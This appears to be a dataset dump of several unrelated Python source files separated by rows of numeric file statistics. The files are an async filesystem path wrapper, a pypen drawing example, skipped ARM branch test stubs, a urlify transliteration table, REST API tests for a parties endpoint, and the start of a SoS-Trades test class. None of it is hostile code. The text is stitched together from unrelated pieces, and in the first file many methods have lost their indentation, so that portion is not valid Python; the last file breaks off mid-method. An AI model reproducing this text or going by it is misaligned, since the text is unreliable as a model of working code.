    Returns the destination path object.
    """
    _dest = self._get_dest(target, overwrite=True)
    self.async_fs.rename(self._cpath_str, _dest._cpath_str)
    # BUG FIX: the method is annotated `-> _P` but previously returned None,
    # unlike its sync sibling's intended contract.
    return _dest
async def async_rm(self, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Delete files.
"""
await self.async_fs._rm(self._cpath_str, recursive, maxdepth, **kwargs)
async def async_rm_file(self, missing_ok: bool = True, **kwargs):
"""
Delete a file
"""
if not await self.async_exists():
if missing_ok: return
raise ValueError(f"{self._path_str} does not exist")
await self.async_fs._rm_file(self._cpath_str, **kwargs)
async def async_rmdir(self, force: bool = False, recursive: bool = True, skip_errors: bool = True) -> None:
"""
Remove the empty directory.
If force, will recursively remove even if not empty.
"""
try:
return self.async_fs.rmdir(self._cpath_str)
except Exception as e:
if force: return await self.async_fs._rm(self._cpath_str, recursive = recursive)
if skip_errors: return
raise e
async def async_rmtree(self, recursive: bool = True, maxdepth: Optional[int] = None) -> None:
"""Remove the directory."""
return await self.async_fs._rm(self._cpath_str, recursive, maxdepth)
async def async_sign(self, expiration: int = 100, **kwargs):
"""
Create a signed URL representing the given path
Some implementations allow temporary URLs to be generated, as a way of delegating credentials
"""
return self.async_fs.sign(self._cpath_str, expiration, **kwargs)
async def async_size(self, **kwargs):
    """
    Size in bytes of the file at this path.
    """
    return await self.async_fs._size(self._cpath_str, **kwargs)
async def async_split_path(self, **kwargs) -> List[str]:
"""
Normalise path string into bucket and key
"""
return self.async_fs.split_path(self._cpath_str, **kwargs)
async def async_tail(self, size: Optional[int] = None):
"""
Get the last size bytes from file
"""
return self.async_fs.tail(self._cpath_str, size)
async def async_touch(self, truncate: bool = True, data = None, **kwargs):
"""
Create empty file or truncate
"""
return await self.async_fs.touch(self._cpath_str, truncate = truncate, data = data, **kwargs)
async def async_unlink(self, missing_ok: bool = True, **kwargs) -> None:
"""
Remove this file or symbolic link.
"""
if getattr(self.async_fs, 'unlink', None): return self.async_fs.unlink(self._cpath_str, missing_ok = missing_ok, **kwargs)
return await self.async_rm_file(missing_ok, **kwargs)
async def async_url(self, expires: int = 3600, client_method: str = 'get_object', **kwargs):
"""
Generate presigned URL to access path by HTTP
"""
return self.async_fs.url(self._cpath_str, expires, client_method, **kwargs)
async def async_upload(self, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
    """
    Copy file(s) from local to `dest`.
    """
    _dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
    # BUG FIX: this previously called `async_fs.url(...)` (copy-paste from
    # `async_url`), which builds a presigned URL instead of uploading.
    # Mirror `async_put_files`, which uses the async `_put`.
    return await self.async_fs._put(self._cpath_str, _dest._cpath_str, recursive=recursive, callback=callback, **kwargs)
class WindowsFSxPath(PosixFSxPath, pathlib.PureWindowsPath):
    """Windows-flavoured variant of PosixFSxPath (uses `ntpath` semantics)."""
    # Path-manipulation module consumed by the shared mixin methods.
    _PATH = ntpath
class PosixIOPath(PosixFSxPath, pathlib.PurePosixPath):
    """
    Pathlib-like API around `upath` providing compatibility with many i/o backends.
    Does not provide async operations.
    """
    _PATH = posixpath
    # Class-level backend slots; only the sync `upath` backend is wired up.
    _FSX: 'upath.UPath' = None
    _SYNC_FS: 'upath.UPath' = None
    _ASYNC_FS: Any = None
    _FSX_LIB: str = 'upath'
    _FSX_MODULE: Optional[str] = None
    _FSX_CLS: str = 'UPath'
    @property
    def async_fs(self) -> 'AsyncFileSystem':
        # Async operations are intentionally unsupported on the upath backend.
        raise NotImplementedError
    @property
    def sync_fs(self) -> 'upath.UPath':
        # NOTE(review): this returns the `UPath` *class*, not an instance —
        # confirm callers expect the class object here.
        return upath.UPath
class WindowsIOPath(PosixIOPath, pathlib.PureWindowsPath):
    """
    Windows-flavoured pathlib-like API around `upath` providing compatibility
    with many i/o backends. Does not provide async operations.
    """
    # Path-manipulation module consumed by the shared mixin methods.
    _PATH = ntpath
os.PathLike.register(PosixFSxPath)
os.PathLike.register(WindowsFSxPath)
os.PathLike.register(PosixIOPath)
os.PathLike.register(WindowsIOPath)
| 36.401804
| 229
| 0.613707
| 6,457
| 52,455
| 4.795571
| 0.059161
| 0.029711
| 0.034491
| 0.018602
| 0.84757
| 0.812143
| 0.785758
| 0.752398
| 0.719393
| 0.704699
| 0
| 0.002531
| 0.269374
| 52,455
| 1,440
| 230
| 36.427083
| 0.805427
| 0.113068
| 0
| 0.491525
| 0
| 0
| 0.02543
| 0.002188
| 0
| 0
| 0
| 0
| 0.00565
| 1
| 0.213277
| false
| 0.001412
| 0.021186
| 0.021186
| 0.460452
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
564f6fb25f1a0031af8e85326aebe06a4789188c
| 132
|
py
|
Python
|
examples/example_005.py
|
Canvim/Pyper
|
5ec310027c94f98349b7f5a728b42540380a34c2
|
[
"MIT"
] | 2
|
2020-07-29T06:48:18.000Z
|
2020-10-13T19:35:53.000Z
|
examples/example_005.py
|
Canvim/PyPen
|
5ec310027c94f98349b7f5a728b42540380a34c2
|
[
"MIT"
] | 8
|
2020-07-19T21:41:58.000Z
|
2020-09-02T09:39:02.000Z
|
examples/example_005.py
|
Canvim/PyPen
|
5ec310027c94f98349b7f5a728b42540380a34c2
|
[
"MIT"
] | null | null | null |
from pypen import *
def start():
    """Paint every canvas pixel as a 1x1 rectangle of a random RGB colour."""
    for px, py in pixels():
        colour = (random(255), random(255), random(255))
        rectangle(px, py, 1, 1, colour)
| 18.857143
| 70
| 0.575758
| 21
| 132
| 3.619048
| 0.666667
| 0.355263
| 0.394737
| 0.473684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11
| 0.242424
| 132
| 6
| 71
| 22
| 0.65
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
568f87d9633f971994a98ee93d1fb03ac90a3092
| 1,720
|
py
|
Python
|
tests/iarm/test_branch.py
|
howardjp/iMCS-48
|
b545a37a9b15fdcdacb4e2ba263f45a9c62df079
|
[
"MIT"
] | 20
|
2016-05-16T18:23:49.000Z
|
2021-08-06T17:15:34.000Z
|
tests/iarm/test_branch.py
|
howardjp/iMCS-48
|
b545a37a9b15fdcdacb4e2ba263f45a9c62df079
|
[
"MIT"
] | 11
|
2016-07-14T17:57:10.000Z
|
2020-11-18T21:11:21.000Z
|
tests/iarm/test_branch.py
|
howardjp/iMCS-48
|
b545a37a9b15fdcdacb4e2ba263f45a9c62df079
|
[
"MIT"
] | 4
|
2016-08-14T19:11:21.000Z
|
2021-08-18T09:38:25.000Z
|
from .test_iarm import TestArm
import iarm.exceptions
import unittest
class TestArmUnconditionalBranch(TestArm):
    """Placeholder tests for the unconditional branch instructions (B, BL, BLX, BX).

    Every case is currently skipped; bodies are stubs awaiting real coverage.
    """
    @unittest.skip('No Test Defined')
    def test_B(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BL(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BLX(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BX(self):
        pass
class TestArmConditionalBranch(TestArm):
    """Placeholder tests for the conditional branch instructions (Bcc family).

    Every case is currently skipped; bodies are stubs awaiting real coverage.
    """
    @unittest.skip('No Test Defined')
    def test_BCC(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BCS(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BEQ(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BGE(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BGT(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BHI(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BHS(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BLE(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BLO(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BLS(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BLT(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BMI(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BNE(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BPL(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BVC(self):
        pass
    @unittest.skip('No Test Defined')
    def test_BVS(self):
        pass
if __name__ == '__main__':
unittest.main()
| 18.901099
| 42
| 0.604651
| 221
| 1,720
| 4.574661
| 0.176471
| 0.237389
| 0.276954
| 0.356083
| 0.789318
| 0.789318
| 0.789318
| 0.789318
| 0.712166
| 0
| 0
| 0
| 0.281395
| 1,720
| 90
| 43
| 19.111111
| 0.817961
| 0
| 0
| 0.597015
| 0
| 0
| 0.17907
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.298507
| false
| 0.298507
| 0.044776
| 0
| 0.373134
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
3b09c0c3514323a9bf6c3fb4f8e1e58c43083d1e
| 6,970
|
py
|
Python
|
urlify.py
|
dreikanter/python-urlify
|
69c68bdd007ea7d33e79bbb2f7e366d5bcda3a02
|
[
"MIT"
] | 7
|
2015-03-20T12:10:51.000Z
|
2017-10-26T03:07:37.000Z
|
urlify.py
|
dreikanter/python-urlify
|
69c68bdd007ea7d33e79bbb2f7e366d5bcda3a02
|
[
"MIT"
] | null | null | null |
urlify.py
|
dreikanter/python-urlify
|
69c68bdd007ea7d33e79bbb2f7e366d5bcda3a02
|
[
"MIT"
] | 3
|
2015-03-20T12:10:59.000Z
|
2020-09-29T11:17:16.000Z
|
# coding: utf-8
import re
__author__ = 'Alex Musayev'
__license__ = 'MIT'
__status__ = 'Development'
__url__ = 'http://github.com/dreikanter/python-urlify'
__version_info__ = (0, 0, 1)
__version__ = '.'.join(map(str, __version_info__))
UBERMAP = {
# Latin:
ord(u'À'): u'A',
ord(u'Á'): u'A',
ord(u'Â'): u'A',
ord(u'Ã'): u'A',
ord(u'Ä'): u'A',
ord(u'Å'): u'A',
ord(u'Æ'): u'AE',
ord(u'Ç'): u'C',
ord(u'È'): u'E',
ord(u'É'): u'E',
ord(u'Ê'): u'E',
ord(u'Ë'): u'E',
ord(u'Ì'): u'I',
ord(u'Í'): u'I',
ord(u'Î'): u'I',
ord(u'Ï'): u'I',
ord(u'Ð'): u'D',
ord(u'Ñ'): u'N',
ord(u'Ò'): u'O',
ord(u'Ó'): u'O',
ord(u'Ô'): u'O',
ord(u'Õ'): u'O',
ord(u'Ö'): u'O',
ord(u'Ő'): u'O',
ord(u'Ø'): u'O',
ord(u'Ù'): u'U',
ord(u'Ú'): u'U',
ord(u'Û'): u'U',
ord(u'Ü'): u'U',
ord(u'Ű'): u'U',
ord(u'Ý'): u'Y',
ord(u'Þ'): u'TH',
ord(u'ß'): u'ss',
ord(u'à'): u'a',
ord(u'á'): u'a',
ord(u'â'): u'a',
ord(u'ã'): u'a',
ord(u'ä'): u'a',
ord(u'å'): u'a',
ord(u'æ'): u'ae',
ord(u'ç'): u'c',
ord(u'è'): u'e',
ord(u'é'): u'e',
ord(u'ê'): u'e',
ord(u'ë'): u'e',
ord(u'ì'): u'i',
ord(u'í'): u'i',
ord(u'î'): u'i',
ord(u'ï'): u'i',
ord(u'ð'): u'd',
ord(u'ñ'): u'n',
ord(u'ò'): u'o',
ord(u'ó'): u'o',
ord(u'ô'): u'o',
ord(u'õ'): u'o',
ord(u'ö'): u'o',
ord(u'ő'): u'o',
ord(u'ø'): u'o',
ord(u'ù'): u'u',
ord(u'ú'): u'u',
ord(u'û'): u'u',
ord(u'ü'): u'u',
ord(u'ű'): u'u',
ord(u'ý'): u'y',
ord(u'þ'): u'th',
ord(u'ÿ'): u'y',
ord(u'©'): u'c',
# Greek:
ord(u'α'): u'a',
ord(u'β'): u'b',
ord(u'γ'): u'g',
ord(u'δ'): u'd',
ord(u'ε'): u'e',
ord(u'ζ'): u'z',
ord(u'η'): u'h',
ord(u'θ'): u'8',
ord(u'ι'): u'i',
ord(u'κ'): u'k',
ord(u'λ'): u'l',
ord(u'μ'): u'm',
ord(u'ν'): u'n',
ord(u'ξ'): u'3',
ord(u'ο'): u'o',
ord(u'π'): u'p',
ord(u'ρ'): u'r',
ord(u'σ'): u's',
ord(u'τ'): u't',
ord(u'υ'): u'y',
ord(u'φ'): u'f',
ord(u'χ'): u'x',
ord(u'ψ'): u'ps',
ord(u'ω'): u'w',
ord(u'ά'): u'a',
ord(u'έ'): u'e',
ord(u'ί'): u'i',
ord(u'ό'): u'o',
ord(u'ύ'): u'y',
ord(u'ή'): u'h',
ord(u'ώ'): u'w',
ord(u'ς'): u's',
ord(u'ϊ'): u'i',
ord(u'ΰ'): u'y',
ord(u'ϋ'): u'y',
ord(u'ΐ'): u'i',
ord(u'Α'): u'A',
ord(u'Β'): u'B',
ord(u'Γ'): u'G',
ord(u'Δ'): u'D',
ord(u'Ε'): u'E',
ord(u'Ζ'): u'Z',
ord(u'Η'): u'H',
ord(u'Θ'): u'8',
ord(u'Ι'): u'I',
ord(u'Κ'): u'K',
ord(u'Λ'): u'L',
ord(u'Μ'): u'M',
ord(u'Ν'): u'N',
ord(u'Ξ'): u'3',
ord(u'Ο'): u'O',
ord(u'Π'): u'P',
ord(u'Ρ'): u'R',
ord(u'Σ'): u'S',
ord(u'Τ'): u'T',
ord(u'Υ'): u'Y',
ord(u'Φ'): u'F',
ord(u'Χ'): u'X',
ord(u'Ψ'): u'PS',
ord(u'Ω'): u'W',
ord(u'Ά'): u'A',
ord(u'Έ'): u'E',
ord(u'Ί'): u'I',
ord(u'Ό'): u'O',
ord(u'Ύ'): u'Y',
ord(u'Ή'): u'H',
ord(u'Ώ'): u'W',
ord(u'Ϊ'): u'I',
ord(u'Ϋ'): u'Y',
# Turkish:
ord(u'ş'): u's',
ord(u'Ş'): u'S',
ord(u'ı'): u'i',
ord(u'İ'): u'I',
ord(u'ç'): u'c',
ord(u'Ç'): u'C',
ord(u'ü'): u'u',
ord(u'Ü'): u'U',
ord(u'ö'): u'o',
ord(u'Ö'): u'O',
ord(u'ğ'): u'g',
ord(u'Ğ'): u'G',
# Russian:
ord(u'а'): u'a',
ord(u'б'): u'b',
ord(u'в'): u'v',
ord(u'г'): u'g',
ord(u'д'): u'd',
ord(u'е'): u'e',
ord(u'ё'): u'yo',
ord(u'ж'): u'zh',
ord(u'з'): u'z',
ord(u'и'): u'i',
ord(u'й'): u'j',
ord(u'к'): u'k',
ord(u'л'): u'l',
ord(u'м'): u'm',
ord(u'н'): u'n',
ord(u'о'): u'o',
ord(u'п'): u'p',
ord(u'р'): u'r',
ord(u'с'): u's',
ord(u'т'): u't',
ord(u'у'): u'u',
ord(u'ф'): u'f',
ord(u'х'): u'h',
ord(u'ц'): u'c',
ord(u'ч'): u'ch',
ord(u'ш'): u'sh',
ord(u'щ'): u'sch',
ord(u'ъ'): u'',
ord(u'ы'): u'y',
ord(u'ь'): u'',
ord(u'э'): u'e',
ord(u'ю'): u'yu',
ord(u'я'): u'ya',
ord(u'А'): u'A',
ord(u'Б'): u'B',
ord(u'В'): u'V',
ord(u'Г'): u'G',
ord(u'Д'): u'D',
ord(u'Е'): u'E',
ord(u'Ё'): u'Yo',
ord(u'Ж'): u'Zh',
ord(u'З'): u'Z',
ord(u'И'): u'I',
ord(u'Й'): u'J',
ord(u'К'): u'K',
ord(u'Л'): u'L',
ord(u'М'): u'M',
ord(u'Н'): u'N',
ord(u'О'): u'O',
ord(u'П'): u'P',
ord(u'Р'): u'R',
ord(u'С'): u'S',
ord(u'Т'): u'T',
ord(u'У'): u'U',
ord(u'Ф'): u'F',
ord(u'Х'): u'H',
ord(u'Ц'): u'C',
ord(u'Ч'): u'Ch',
ord(u'Ш'): u'Sh',
ord(u'Щ'): u'Sch',
ord(u'Ъ'): u'',
ord(u'Ы'): u'Y',
ord(u'Ь'): u'',
ord(u'Э'): u'E',
ord(u'Ю'): u'Yu',
ord(u'Я'): u'Ya',
# Ukrainian:
ord(u'Є'): u'Ye',
ord(u'І'): u'I',
ord(u'Ї'): u'Yi',
ord(u'Ґ'): u'G',
ord(u'є'): u'ye',
ord(u'і'): u'i',
ord(u'ї'): u'yi',
ord(u'ґ'): u'g',
# Czech:
ord(u'č'): u'c',
ord(u'ď'): u'd',
ord(u'ě'): u'e',
ord(u'ň'): u'n',
ord(u'ř'): u'r',
ord(u'š'): u's',
ord(u'ť'): u't',
ord(u'ů'): u'u',
ord(u'ž'): u'z',
ord(u'Č'): u'C',
ord(u'Ď'): u'D',
ord(u'Ě'): u'E',
ord(u'Ň'): u'N',
ord(u'Ř'): u'R',
ord(u'Š'): u'S',
ord(u'Ť'): u'T',
ord(u'Ů'): u'U',
ord(u'Ž'): u'Z',
# Polish:
ord(u'ą'): u'a',
ord(u'ć'): u'c',
ord(u'ę'): u'e',
ord(u'ł'): u'l',
ord(u'ń'): u'n',
ord(u'ó'): u'o',
ord(u'ś'): u's',
ord(u'ź'): u'z',
ord(u'ż'): u'z',
ord(u'Ą'): u'A',
ord(u'Ć'): u'C',
ord(u'Ę'): u'e',
ord(u'Ł'): u'L',
ord(u'Ń'): u'N',
ord(u'Ó'): u'o',
ord(u'Ś'): u'S',
ord(u'Ź'): u'Z',
ord(u'Ż'): u'Z',
# Latvian:
ord(u'ā'): u'a',
ord(u'č'): u'c',
ord(u'ē'): u'e',
ord(u'ģ'): u'g',
ord(u'ī'): u'i',
ord(u'ķ'): u'k',
ord(u'ļ'): u'l',
ord(u'ņ'): u'n',
ord(u'š'): u's',
ord(u'ū'): u'u',
ord(u'ž'): u'z',
ord(u'Ā'): u'A',
ord(u'Č'): u'C',
ord(u'Ē'): u'E',
ord(u'Ģ'): u'G',
ord(u'Ī'): u'i',
ord(u'Ķ'): u'k',
ord(u'Ļ'): u'L',
ord(u'Ņ'): u'N',
ord(u'Š'): u'S',
ord(u'Ū'): u'u',
ord(u'Ž'): u'Z',
}
EXCLUSIONS = [
'a',
'an',
'as',
'at',
'before',
'but',
'by',
'for',
'from',
'is',
'in',
'into',
'like',
'of',
'off',
'on',
'onto',
'per',
'since',
'than',
'the',
'this',
'that',
'up',
'via',
'with',
]
_base = re.compile(r"[a-zA-Z\d\s-]+")
_space = re.compile(r"[\s_\-]+")
def urlify(text, exclude=EXCLUSIONS, ext_map=None):
    """Convert *text* into a URL-friendly slug.

    ASCII letters, digits, whitespace and dashes are kept as-is; every other
    character is transliterated via UBERMAP (optionally extended by *ext_map*)
    or dropped. The result is lower-cased, stop-words in *exclude* are
    stripped, and runs of whitespace/underscores/dashes collapse to '-'.
    """
    # BUG FIX: the original used a mutable default argument (`ext_map={}`)
    # and mutated the module-level UBERMAP in place, so extensions from one
    # call silently leaked into every later call. Work on a copy instead.
    charmap = dict(UBERMAP)
    if ext_map:
        charmap.update(ext_map)
    mapchar = lambda c: c if _base.match(c) else charmap.get(ord(c), '')
    result = ''.join(map(mapchar, text)).lower()
    stopwords = re.compile('|'.join(r"\b%s\b" % word for word in exclude))
    return _space.sub('-', stopwords.sub('', result)).strip('-')
| 19.85755
| 74
| 0.366284
| 1,527
| 6,970
| 1.648985
| 0.169614
| 0.444797
| 0.047657
| 0.057188
| 0.772836
| 0.764893
| 0.764893
| 0.742653
| 0.742653
| 0.732327
| 0
| 0.00159
| 0.278192
| 6,970
| 350
| 75
| 19.914286
| 0.498509
| 0.011478
| 0
| 0.08
| 0
| 0
| 0.110901
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.003077
| false
| 0
| 0.003077
| 0
| 0.009231
| 0
| 0
| 0
| 1
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3b3d10638bea4ba43e0e4c4b9d426c928202e307
| 8,007
|
py
|
Python
|
services/core-api/tests/parties/party/resources/test_party_resource.py
|
parc-jason/mds
|
8f181a429442208a061ed72065b71e6c2bd0f76f
|
[
"Apache-2.0"
] | null | null | null |
services/core-api/tests/parties/party/resources/test_party_resource.py
|
parc-jason/mds
|
8f181a429442208a061ed72065b71e6c2bd0f76f
|
[
"Apache-2.0"
] | null | null | null |
services/core-api/tests/parties/party/resources/test_party_resource.py
|
parc-jason/mds
|
8f181a429442208a061ed72065b71e6c2bd0f76f
|
[
"Apache-2.0"
] | 1
|
2020-01-22T14:19:16.000Z
|
2020-01-22T14:19:16.000Z
|
import json, uuid
from tests.factories import PartyFactory
from app.api.utils.custom_reqparser import DEFAULT_MISSING_REQUIRED
# GET
def test_get_person_not_found(test_client, db_session, auth_headers):
    """Fetching a random, nonexistent party GUID yields 404 with a message."""
    response = test_client.get(
        f'/parties/{uuid.uuid4()}', headers=auth_headers['full_auth_header'])
    body = json.loads(response.data.decode())
    assert response.status_code == 404
    assert 'not found' in body['message']
def test_get_person(test_client, db_session, auth_headers):
    """Fetching an existing person by GUID returns 200 and echoes the GUID."""
    guid = PartyFactory(person=True).party_guid
    response = test_client.get(
        f'/parties/{guid}', headers=auth_headers['full_auth_header'])
    body = json.loads(response.data.decode())
    assert response.status_code == 200
    assert body['party_guid'] == str(guid)
# POST
def test_post_person_no_first_name(test_client, db_session, auth_headers):
    """Posting a PER party without a first name is rejected with 400."""
    payload = {
        "party_name": "Last",
        "party_type_code": "PER",
        "phone_no": "123-456-7890",
        "email": "this@test.com"
    }
    response = test_client.post(
        '/parties', data=payload, headers=auth_headers['full_auth_header'])
    body = json.loads(response.data.decode())
    assert response.status_code == 400
    assert 'first name' in body['message'].lower()
def test_post_person_no_required_party_name(test_client, db_session, auth_headers):
    """Posting without the required party_name is rejected with 400."""
    payload = {
        "first_name": "First",
        "party_type_codetype": "PER",
        "phone_no": "123-456-7890",
        "email": "this@test.com"
    }
    response = test_client.post(
        '/parties', data=payload, headers=auth_headers['full_auth_header'])
    body = json.loads(response.data.decode())
    assert response.status_code == 400
    assert DEFAULT_MISSING_REQUIRED in body['message']
def test_post_person_no_required_phone_no(test_client, db_session, auth_headers):
    """Posting without the required phone_no is rejected with 400."""
    payload = {
        "first_name": "First",
        "party_name": "Last",
        "party_type_codetype": "PER",
        "email": "this@test.com"
    }
    response = test_client.post(
        '/parties', data=payload, headers=auth_headers['full_auth_header'])
    body = json.loads(response.data.decode())
    assert response.status_code == 400
    assert DEFAULT_MISSING_REQUIRED in body['message']
def test_post_person_success(test_client, db_session, auth_headers):
    """A fully-populated PER party POST succeeds (200) and echoes every field."""
    payload = {
        "party_name": "Last",
        "email": "this@test.com",
        "phone_no": "123-456-7890",
        "party_type_code": "PER",
        "first_name": "First",
        "suite_no": "1234",
        "address_line_1": "1234 Foo Street",
        "address_line_2": "1234 Bar Blvd",
        "city": "Baz Town",
        "sub_division_code": "BC",
        "post_code": "X0X0X0",
        "address_type_code": "CAN"
    }
    response = test_client.post(
        '/parties', data=payload, headers=auth_headers['full_auth_header'])
    body = json.loads(response.data.decode())
    assert response.status_code == 200, response.response
    # Top-level party fields are echoed back verbatim.
    for field in ('party_name', 'email', 'phone_no', 'party_type_code', 'first_name'):
        assert body[field] == payload[field]
    # Address fields land on the first (and only) address record.
    address = body['address'][0]
    for field in ('suite_no', 'address_line_1', 'address_line_2', 'city',
                  'sub_division_code', 'post_code', 'address_type_code'):
        assert address[field] == payload[field]
def test_post_company_success(test_client, db_session, auth_headers):
    """An ORG party POST (no first_name required) succeeds and echoes every field."""
    payload = {
        "party_name": "Last",
        "email": "this@test.com",
        "phone_no": "123-456-7890",
        "party_type_code": "ORG",
        "suite_no": "1234",
        "address_line_1": "1234 Foo Street",
        "address_line_2": "1234 Bar Blvd",
        "city": "Baz Town",
        "sub_division_code": "BC",
        "post_code": "X0X0X0",
        "address_type_code": "CAN"
    }
    response = test_client.post(
        '/parties', data=payload, headers=auth_headers['full_auth_header'])
    body = json.loads(response.data.decode())
    assert response.status_code == 200
    # Top-level party fields are echoed back verbatim.
    for field in ('party_name', 'email', 'phone_no', 'party_type_code'):
        assert body[field] == payload[field]
    # Address fields land on the first (and only) address record.
    address = body['address'][0]
    for field in ('suite_no', 'address_line_1', 'address_line_2', 'city',
                  'sub_division_code', 'post_code', 'address_type_code'):
        assert address[field] == payload[field]
# PUT
def test_put_person_not_found(test_client, db_session, auth_headers):
    """PUT against a guid that does not exist returns 404."""
    payload = {"first_name": 'First', "party_name": 'Last'}
    response = test_client.put(
        f'/parties/{uuid.uuid4()}', data=payload, headers=auth_headers['full_auth_header'])
    body = json.loads(response.data.decode())
    assert response.status_code == 404
    assert 'not found' in body['message']
def test_put_person_success(test_client, db_session, auth_headers):
    """PUT on an existing person updates and echoes every submitted field."""
    guid = PartyFactory(person=True).party_guid
    payload = {
        "party_name": "Changedlast",
        "email": "new_email_12345@testuser.com",
        "phone_no": "682-732-8490",
        "party_type_code": "PER",
        "first_name": "Changedfirst",
        "suite_no": "1234",
        "address_line_1": "1234 Foo Street",
        "address_line_2": "1234 Bar Blvd",
        "city": "Baz Town",
        "sub_division_code": "BC",
        "post_code": "X0X0X0",
        "address_type_code": "CAN"
    }
    response = test_client.put(
        f'/parties/{guid}', data=payload, headers=auth_headers['full_auth_header'])
    body = json.loads(response.data.decode())
    assert response.status_code == 200
    # Top-level party fields reflect the update.
    for field in ('party_name', 'email', 'phone_no', 'party_type_code', 'first_name'):
        assert body[field] == payload[field]
    # Address fields land on the first (and only) address record.
    address = body['address'][0]
    for field in ('suite_no', 'address_line_1', 'address_line_2', 'city',
                  'sub_division_code', 'post_code', 'address_type_code'):
        assert address[field] == payload[field]
# DELETE
def test_delete_person_as_admin(test_client, db_session, auth_headers):
    """DELETE removes the party (204); a follow-up GET then yields 404."""
    guid = PartyFactory(person=True).party_guid
    headers = auth_headers['full_auth_header']
    delete_resp = test_client.delete(f'/parties/{guid}', headers=headers)
    assert delete_resp.status_code == 204
    # The deleted party must no longer be retrievable.
    follow_up = test_client.get(f'/parties/{guid}', headers=headers)
    assert follow_up.status_code == 404
| 41.921466
| 100
| 0.694642
| 1,106
| 8,007
| 4.618445
| 0.089512
| 0.095928
| 0.134299
| 0.042287
| 0.895067
| 0.879796
| 0.861394
| 0.838293
| 0.828309
| 0.785826
| 0
| 0.023416
| 0.167978
| 8,007
| 190
| 101
| 42.142105
| 0.74332
| 0.002373
| 0
| 0.704403
| 0
| 0
| 0.265564
| 0.019792
| 0
| 0
| 0
| 0
| 0.327044
| 1
| 0.062893
| false
| 0
| 0.018868
| 0
| 0.081761
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3b8b48fea96fa0fb4c9124889bd993c1a071deea
| 93,415
|
py
|
Python
|
sos_trades_core/tests/l0_test_54_advanced_archi_builder.py
|
os-climate/sostrades-core
|
bcaa9b5e393ffbd0963e75a9315b27caf8b0abd9
|
[
"Apache-2.0"
] | 8
|
2022-01-10T14:44:28.000Z
|
2022-03-31T08:57:14.000Z
|
sos_trades_core/tests/l0_test_54_advanced_archi_builder.py
|
os-climate/sostrades-core
|
bcaa9b5e393ffbd0963e75a9315b27caf8b0abd9
|
[
"Apache-2.0"
] | null | null | null |
sos_trades_core/tests/l0_test_54_advanced_archi_builder.py
|
os-climate/sostrades-core
|
bcaa9b5e393ffbd0963e75a9315b27caf8b0abd9
|
[
"Apache-2.0"
] | 1
|
2022-02-21T14:51:45.000Z
|
2022-02-21T14:51:45.000Z
|
'''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
mode: python; py-indent-offset: 4; tab-width: 4; coding: utf-8
'''
import unittest
from tempfile import gettempdir
import pandas as pd
from sos_trades_core.execution_engine.execution_engine import ExecutionEngine
from sos_trades_core.execution_engine.sos_discipline_scatter import SoSDisciplineScatter
from sos_trades_core.sos_wrapping.valueblock_discipline import ValueBlockDiscipline
class TestAdvancedArchiBuilder(unittest.TestCase):
"""
Class to test multi level process built from architecture builder, scatter of architecture and cleaning
"""
def setUp(self):
    '''
    Initialize third data needed for testing
    '''
    # Directories created during a test that should be cleaned up afterwards
    # (presumably consumed by a tearDown outside this view — TODO confirm).
